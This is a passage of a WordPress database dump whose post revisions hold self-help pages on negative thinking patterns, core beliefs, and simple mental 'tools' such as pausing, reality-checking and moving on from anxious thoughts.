/wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>All-or-nothing thinking can make you unhappy as it can make you judge situations wrongly. The following short examples will help you to understand how it can cause harm.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Example 1</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Imagine that you have a good friend called Lucy. She has been a true friend to you for many years, sharing your happiness and troubles. Lucy has always gone out of her way to be helpful to you whenever you were in need.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us now imagine that today is your birthday and that Lucy, perhaps because she was busy, forgot to wish you. Now let us suppose that your brain does all-or-nothing thinking. Your brain will make you think, â€œLucy is a really terrible person who does not care about me at all. How could she forget my birthday, when she knows I like people to wish me? She is completely useless, etc.â€ In this scenario, â€œall-or-nothing thinkingâ€ is making you think only in extremes. You ignore all the good that Lucy has done over the years, and instead, let this one small error made by her, make her â€œall badâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In reality, while it was â€œbadâ€ for Sally to have forgotten your birthday, it was only one â€œbadâ€ thing among the many more â€œgoodâ€ things she has done for you over the years. So instead of seeing Lucy as â€œcompletely badâ€, a better way would be to see her as being â€œmostly goodâ€ and only â€œslightly badâ€. As you have seen in this example, all-or-nothing thinking can make one judge people unfairly.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Example 2</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Anju goes to a restaurant and has a three-course meal. The starters taste fantastic, the main course is equally delicious, and even the dessert is super good. Then at the end, Anju orders a coffee. The waiter brings the coffee and as a special treat, also brings a biscuit to go with it. Anju finds the coffee to be excellent but unfortunately discovers that the biscuit is a little spoiled.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At this point, letâ€™s imagine that Anjuâ€™s brain does all-or-nothing thinking. This makes her focus only on the spoilt biscuit and completely forget that the other parts of the meal were fantastic. Anju complains about the biscuit for the rest of the evening, telling everyone how the meal was completely terrible.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see how, because of all-or-nothing thinking, the restaurant was not judged fairly. This is not to say that the spoilt biscuit should have been ignored. Rather, it is about putting things in the correct perspective.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you have seen in the above examples, all-or-nothing thinking distorts how things really are, and this can make one make wrong judgments.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/catastrophic-thinking/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negative-core-beliefs/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'All or nothing thinking', '', 'inherit', 'closed', 'closed', '', '1627-revision-v1', '', '', '2023-06-06 19:01:06', '2023-06-06 19:01:06', '', 1627, 'https://www.happythinking.com/?p=1753', 0, 'revision', '', 0),
(1754, 1, '2023-06-06 19:02:42', '2023-06-06 19:02:42', '<!-- wp:paragraph -->\n<p>First of all, let me make it clear that when I talk about â€œbeliefsâ€, I certainly do not mean religious beliefs! Rather, it is about the beliefs one has about oneself, other people, and the world. For example, regarding oneself, one might have the belief, â€œI am caringâ€. Regarding others, one might have the belief, â€œPeople are selfishâ€ and regarding the world, one might have the belief, â€œThere are a lot of dangers out there.â€ Such beliefs are central to a person''s view of everything within and outside, and for this reason, are called â€œcore beliefsâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When one is born, oneâ€™s mind essentially has no beliefs about anything. However, from that blank state onwards, one starts to form beliefs about various things. For example, even as a baby, one would learn which faces belong to those that will cuddle and give nourishment and which faces belong to those who provide no benefit. I.e. one forms certain beliefs about who is â€œgoodâ€ for oneâ€™s survival and who is â€œbadâ€. As oneâ€™s childhood years progress, one''s brain continually updates oneâ€™s core beliefs.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Core beliefs are the driving force of a person, and one''s mind tries its best to think in ways that support such core beliefs. I call thoughts that support oneâ€™s core beliefs, â€œsupporting thoughtsâ€. For example, imagine that a person has the core belief, â€œI can learn new thingsâ€. For this core belief, one of the supportive thoughts might be, â€œIf I have an opportunity to learn new things, I should take up that opportunityâ€. Letâ€™s take another example, where a person, who we will call Sujith, has the core belief, â€œI have good leadership skillsâ€. Now suppose Sujith, at a social event, meets an owner of a major company and that person offers Sujith a very attractive job as a manager. In this situation, Sujithâ€™s mind may develop the supporting thought, â€œI have the skills that will help me to do well in this new job, therefore I should accept itâ€, prompting him to take up that offer. However, let us now imagine that Sujith''s mind has the opposite core belief, â€œI have poor leadership skillsâ€. In this scenario, if he was offered the same job, his mind might have the supporting thought, â€œYou have useless leadership skills and you will therefore fail in this new jobâ€, prompting him to refuse the job offer. The supporting thoughts blindly support one''s core beliefs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As core beliefs direct almost all aspects of oneâ€™s life, itâ€™s very important that one has core beliefs that truly represent oneself. You may now wonder how one can have core beliefs that do not truly represent oneself. Unfortunately, this can happen quite easily and I will explain how. As mentioned before, core beliefs start to form in oneâ€™s childhood, which is a time when oneâ€™s mind is not fully developed and is quite immature. This can lead to one having core beliefs that may not be truly logical. For example, imagine that a small child is with her mother, who is quite preoccupied with some pressing issue. As they walk in the park, imagine that the mother buys ice cream for her child. Unfortunately, a few minutes later, imagine that the child accidentally drops the ice cream, and the mother, in a lapse of concentration, says, â€œYou are stupidâ€. While an adult in this situation would not consider herself to be seriously stupid just because one drops an ice cream, for a child, who does not have the mental maturity of an adult, this event, coming from her mother who she values, may be taken seriously, and lead to the formation of the negative core belief, â€œI am stupidâ€. Now you might say, â€œSurely, when this child grows up, she would replace this with a more realistic core belief, such as â€œI am not stupid.â€ Unfortunately, things are not all that logical when it comes to the mind! What can happen is that some childhood core beliefs can remain unchanged in the mind and persist into adulthood. This can happen because oneâ€™s mind may have not â€œbotheredâ€ to challenge those beliefs with new, more logical adult thinking. Such unchallenged negative core beliefs that persist into adulthood can cause harm. In the example of the child with the negative core belief, â€œI am stupidâ€, if this is not challenged with new thinking (i.e. adult logic), the adult may well continue with the same negative core belief, and that may well limit the potential of this adult. For example, this unchallenged negative core belief may well dissuade the adult from pursuing a university education. This would be a pity, because this negative core belief may well be untrue, and the person may well have flourished in university.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Such unchallenged negative core beliefs may remain quietly in the background, and get activated at only certain times. For example, continuing with the ice cream example, the adult person may not be always thinking â€œI am stupid.â€ But say, when this person thinks about applying for a university education, the â€œI am stupidâ€ negative core belief may surface at that moment, and dissuade the person from continuing.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Core beliefs can sometimes be difficult to discover as they may lie in the background. However, you will recall that the mind also has â€œsupporting thoughtsâ€, that support core beliefs. If you cannot work out your core beliefs, you may be able to recognise the supporting thoughts instead. For example, when thinking about higher education, you may not recognise the negative core belief â€œI am stupidâ€, but instead, recognise the supporting thought, â€œI should not apply to university, as I will surely fail if I enrolled in one.â€ Such supporting thoughts that support untrue negative core beliefs can unnecessarily negatively affect your life. Analysing oneâ€™s negative thinking patterns can suggest the hidden negative core beliefs in a person.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you can imagine, unchallenged core beliefs can unnecessarily limit a person''s potential. One goal of happy thinking is of course to deal with such beliefs. However, we will keep that for later on the website, when we discuss various psychological tools that you can use to access and change core beliefs. For now, just remember the basic concept of core beliefs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/all-or-nothing-thinking/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/forgetting-gratitude/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Negative core beliefs', '', 'inherit', 'closed', 'closed', '', '1632-revision-v1', '', '', '2023-06-06 19:02:42', '2023-06-06 19:02:42', '', 1632, 'https://www.happythinking.com/?p=1754', 0, 'revision', '', 0),
(1755, 1, '2023-06-06 19:06:04', '2023-06-06 19:06:04', '<!-- wp:paragraph -->\n<p>In the past sections, we went through common negative thinking patterns that can contribute to one being unhappy. Now that you understand these negative thinking patterns you will be able to recognise such thinking when it happens in your own mind. However, while recognition itself might make you feel better, the real changes will only come when you are able to change negative thinking patterns into more helpful positive thinking patterns.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It would have been wonderful if there was a magical brain surgeon who could magically rewire our brains so that we would be able to think in more helpful ways. Unfortunately, such magical surgeons do not exist, and I doubt something like that would be even possible in our lifetime. While scientific understanding of how our brains work has progressed hugely, we still know very little and there is a long way to go before seeing exactly how â€œthinkingâ€ happens. However, luckily for us, the human mind has an amazing power, which is the power to heal itself. Our minds have the ability to analyse our thoughts and change themselves.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So how can oneâ€™s mind change itself? This one can be done using â€œtoolsâ€, something like how a car mechanic would use various tools to fix a car not running well. Of course, the tools one can use on the mind are not made of metal, but instead, are made of psychological techniques that one can use to change how one thinks. In the next sections of this website, I will share with you these psychological tools which you can use to change your thinking into ways that promote happiness in you (i.e. Happy Thinking!).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Some of the psychological tools will help you better detect when you are thinking in negative ways. i.e. you will become more â€œsensitiveâ€ in detecting negative thinking patterns when it happens in your mind. Other tools will help you to change negative thinking patterns into helpful positive thinking patterns.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Some tools will be more useful to use right at the moment that you detect negative thinking patterns in your mind, whereas other tools will be more useful at times when you are able to reflect on how you were thinking on the day. i.e. some tools are â€œimmediate useâ€ tools whereas others are â€œuse laterâ€ tools, to be used when you are relaxed.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When an engineer uses tools to fix a machine, they have to choose the correct tool. Not all tools will be useful to repair a given fault. Also, sometimes, a fault will need multiple tools to be used together. The use of psychological tools is no different. You will need to try various tools to see which one works for you. And also, you may well need to use more than one tool at the same time.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>You may find that some of the psychological tools may appear to be â€œsimpleâ€, and this may put you off. Do not confuse simple as being the same as being â€œineffectiveâ€! Many solutions in life do not have to be complex, and the key is to try and judge for yourself how useful or not useful something is. Do not prejudge, rather, give the tools a chance before putting them away.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Negative thinking patterns can develop over many years and get entrenched into oneâ€™s mind, making oneâ€™s mind resist change. In the next sections of this website, you will embark on learning about the various psychological tools that I will share with you. As you start your journey, remember to open up your mind to change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/forgetting-gratitude/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/inner-voice/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Psychological tools', '', 'inherit', 'closed', 'closed', '', '1641-revision-v1', '', '', '2023-06-06 19:06:04', '2023-06-06 19:06:04', '', 1641, 'https://www.happythinking.com/?p=1755', 0, 'revision', '', 0);
INSERT INTO `wpou_posts` VALUES
(1756, 1, '2023-06-06 19:07:14', '2023-06-06 19:07:14', '<!-- wp:paragraph -->\n<p>Happy thinking is about dealing with negative thinking patterns using â€œtoolsâ€. However, the tools one uses to deal with oneâ€™s mind are obviously not real metal tools like what a mechanic might use! One cannot open up oneâ€™s skull to work on oneâ€™s mind (please do not try!). Luckily a more practical option is however available to all of us, and that is to use oneâ€™s inner voice to â€œtalkâ€ to oneâ€™s mind. This is not as strange as you may imagine. Everyone has an inner voice, which in some can be quite obvious whereas in others it may stay mostly in the background. One may â€œhearâ€ oneâ€™s inner voice when one reads. Perhaps you can hear your inner voice right now as you read this very sentence!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Many tools in happy thinking will make use of oneâ€™s inner voice to deal with thoughts. Itâ€™s sort of like talking to oneself, but doing so inside oneâ€™s mind rather than speaking words out loud. Oneâ€™s inner voice, even though silent to those around oneself, is actually a very powerful force to deal with negative thinking patterns. In some sense, a lot of unhappiness is due to people not talking to themselves! One may talk to hundreds of people, and yet forget to talk to oneself.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/psychological-tools/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/pause-tool/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Inner voice', '', 'inherit', 'closed', 'closed', '', '1646-revision-v1', '', '', '2023-06-06 19:07:14', '2023-06-06 19:07:14', '', 1646, 'https://www.happythinking.com/?p=1756', 0, 'revision', '', 0),
(1757, 1, '2023-06-06 19:08:35', '2023-06-06 19:08:35', '<!-- wp:paragraph -->\n<p>In our minds, various thoughts appear and quickly spread into different areas. These thoughts may create positive thinking patterns or negative thinking patterns and happy thinking is about applying tools to deal with the latter. However, it would be very difficult to meaningfully interact with such â€œspeedingâ€ thoughts. To engage with a thought, one needs to first pause it so that it can â€œhearâ€ you. It''s a bit like when a child is crazily running around in a room, to speak to the child meaningfully, one will first need the child to cease running and become still. In the case of the child, you may shout her name loudly, â€œShelly!â€,&nbsp; and this would, at least briefly, make her pause her running around. Once you get her attention, you may be able to engage with her, â€œShelly, itâ€™s time for dinner!â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So how can one get the attention of a thought that is speeding along? The answer is to use oneâ€™s inner voice. As soon as one senses a negative thinking pattern occurring in oneâ€™s mind, one can use oneâ€™s internal voice to say as strongly as possible, â€œPause!â€ What this does is to temporarily â€œfreezeâ€ the thought, so that oneâ€™s mind can engage with it before it continues to cause more negative thoughts to be generated.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let me explain this concept using an example. Letâ€™s imagine that a person, who we will call Jay, is a very anxious person and he is at his home waiting for his partner to return from work. He looks at the clock and notices that it''s ten minutes past the time that his partner normally returns home from work. Imagine that at this point, Jayâ€™s mind generates the following negative thought, â€œShe must have met with a horrendous road traffic accident.â€ At this point, this thought is unnecessarily negative because there is no information to say that an accident has actually happened, and there are so many other less serious options such as being stuck in traffic. Jayâ€™s mind is simply â€œassumingâ€ that an accident has happened, when actually, at this point there is no information to support that thought. So at this point, Jayâ€™s incorrect assumption is making him unnecessarily worry. Jay is aware that he suffers from anxiety and he has some suspicions that his thoughts are probably negative. So his first step is to pause the thought, and he does this by using his internal voice and saying to his mind, â€œpauseâ€. This will briefly pause his negative thought, â€œShe must have met with a horrendous road traffic accident.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Now if this was all that had to be done for negative thinking patterns, i.e. just saying â€œpauseâ€, wouldnâ€™t that be great? A few â€œpausesâ€ and everything would be fine! As you have probably guessed, there are a few more steps needed. That is, once a negative thinking pattern has been paused, one will need to use a few other simple tools to deal with the thought, and I will explain those tools in subsequent sections of this website.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Some of you may think, â€œWhy not use the word â€˜stopâ€™ instead of the word â€˜pauseâ€™, as the former is a much more commanding word?â€ The reason is, perhaps like humans, thoughts do not â€˜likeâ€™ to follow orders! Let me demonstrate this using a simple psychological experiment that we can do right now. Are you ready? Ok. I am going to give you a super easy task now. For this task, you do not even have to move a finger! Here is your task: â€œPlease DO NOT think of a white rabbit.â€ I am sure you will agree that it is quite an easy task, where all I have asked you to do is not think of a white rabbit. However, I am quite sure that most of you would have failed this simple task and would have thought, at least briefly and vaguely, of a white rabbit! This is a very common finding and highlights how telling your thoughts to go away (e.g. â€œby saying stopâ€) does not work, and even can have the opposite effect. That is why I named this tool the â€œpause toolâ€ rather than naming it the â€œstop toolâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The pause tool may appear simplistic, but once you combine it with the other tools that I will explain to you later, you will realise that it is actually quite powerful. The aim of the pause tool is to simply hold a negative thought just long enough for other tools to engage with it. Donâ€™t underestimate the power of your inner voice!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/inner-voice/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/reality-check-tool/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Pause tool', '', 'inherit', 'closed', 'closed', '', '1650-revision-v1', '', '', '2023-06-06 19:08:35', '2023-06-06 19:08:35', '', 1650, 'https://www.happythinking.com/?p=1757', 0, 'revision', '', 0),
(1758, 1, '2023-06-06 19:09:51', '2023-06-06 19:09:51', '<!-- wp:paragraph -->\n<p>As you know by now, the main aim of happy thinking is to help one deal with negative thinking patterns. A common feature of negative thinking patterns is that often they are negative because they distort reality. That is, such thoughts are based more on what one â€œimaginesâ€ the truth to be rather than what the truth actually is.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For a moment, letâ€™s assume that you are a judge in a court of law and that there is a person in front of you who has been accused of stealing a cake (I suppose it''s not the most serious of crimes, but this is only an example!). Now as a good and professional judge, it would be crazy for you to tell the accused, â€œHey, I â€˜imagineâ€™ that you must have stolen that cake, and therefore I declare that you are guilty.â€ There would be an uproar in the court because one needs to judge someone based on evidence rather than mere imagination. Unfortunately, oneâ€™s mind can often rely on imagination rather than facts, and this can cause one to have a lot of unnecessary distress. People often make the mistake of assuming that their thoughts accurately represent reality, when actually, they often may not. This is where a tool which I call the â€œreality check toolâ€, can be very useful. With this tool, after using the pause tool to â€œpauseâ€ the negative thought, one asks oneâ€™s mind, â€œHow much of this thought is based on real evidence and how much of this thought is based on imagination.â€ Let us continue with our example from the previous section, where Jayâ€™s partner was only ten minutes late returning home from work and he was having the negative thought, â€œShe must have met with a terrible road traffic accidentâ€. Jay first uses the â€œpause toolâ€ where he uses his internal voice and says â€œpauseâ€ to himself.&nbsp; He then applies the reality check tool to the paused thought, and asks himself, â€œWhat actual evidence do I have that supports my thought that my partner has had a terrible road traffic accident?â€. As Jay looks for evidence, he realises that he actually does not have any evidence that his partner has met with a road traffic accident. There are no phone calls or messages, no news reports, etc at this point to indicate that something awful has happened. Rather, he realises that he has â€œimaginedâ€ a thought with the worst outcome rather than having an evidence-based thought. With this realisation, Jayâ€™s negative thought dies away.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This is not to say that Jayâ€™s thought was utterly unrealistic as after all road traffic accidents do happen. Rather, the issue is that Jayâ€™s imagination was assuming the worst before there was actual evidence to support that view. The imagined negative thought would have caused him to have unnecessary worry and possibly even panic, before being at all certain that such worry was warranted. In fact, to highlight this, letâ€™s make our example have a happy ending. Soon after Jay uses the reality check tool, his partner walks through the door five minutes later, saying, â€œGosh there was so much traffic on the roads today!â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When using the reality check tool, one must take care to only look for genuine evidence that could justify the negative thought and avoid the temptation to â€œimagineâ€ evidence (i.e. fake evidence!). This can happen if oneâ€™s mind is desperate to prove that the negative thought is true. When using the reality check tool, it would of course be useless to compare imaginary evidence Vs imagination!&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So in summary, the reality check tool is about asking, â€œHow much of this thought is based on real evidence and how much of this thought is based on imagination.â€ One will find that with negative thoughts, there will be little or no evidence to support it. Once one realises that, the negative thought should fade away.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/pause-tool/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/ignore-move-on-tool/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Reality check tool', '', 'inherit', 'closed', 'closed', '', '1655-revision-v1', '', '', '2023-06-06 19:09:51', '2023-06-06 19:09:51', '', 1655, 'https://www.happythinking.com/?p=1758', 0, 'revision', '', 0),
(1759, 1, '2023-06-06 19:11:25', '2023-06-06 19:11:25', '<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the previous section, you learnt about the â€œreality checkâ€ tool. When using that tool, most of the time, one will find that when looking for evidence to support the negative thought, that thought just disappears, almost as if that thought realises on its own that it is no longer valid. However, sometimes one may find that even though one has shown that there is little evidence to support a negative thought, that thought may still â€œhang aroundâ€. If this were to happen, it is crucial that one does not â€œpushâ€ the negative thought away. As I explained to you when describing the pause tool, trying to stop or push away a thought can actually have the opposite effect, where the thought comes back even more. A much better option is to let the thought hang around as much as it likes, but crucially, since one knows that the thought is not valid, one can just ignore it. â€œIgnoringâ€ means that even though the thought is present, one does not react to it. One does not react to the thought because one knows, by using the reality check tool, that the negative thought does not represent reality. Ultimately a thought that one does not react to will disappear, just like if one does not react to a friend, that friend will soon get bored and will leave!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A very effective way to help ignore a thought is to add another step, which I call â€œMove onâ€. Essentially, after one decides to ignore a thought, one moves oneâ€™s mindâ€™s attention onto something else. Let me explain using the example we used in the previous sections, where Jayâ€™s partner was a bit late returning home from work. You will note that one can often use multiple combinations of tools together. This is sort of like how a mechanic will often use more than one tool when repairing a machine.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So putting all this together, let''s see an example of the â€œIgnore/ Move onâ€ tool in use.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We start with Jayâ€™s partner not being home 10 minutes past the usual time she normally returns home from work. Jay has the negative thought, â€œShe must have had a terrible road traffic accidentâ€. Jay then uses the â€œpause toolâ€ where he uses his internal voice and says â€œpauseâ€ to himself. He then applies the reality check tool to the paused thought, and asks himself, â€œWhat actual evidence do I have that supports my thought that my partner has had a terrible road traffic accident?â€. As Jay looks for evidence, he realises that he actually does not have any evidence that his partner has met with a road traffic accident. Since he still has the negative thought lingering in the background of his mind, he decides to use the ignore &amp; move on tool. Using his internal voice, he says to himself â€œIgnore and Move onâ€. He doesnâ€™t react to the negative thought and lets it be. He then moves on 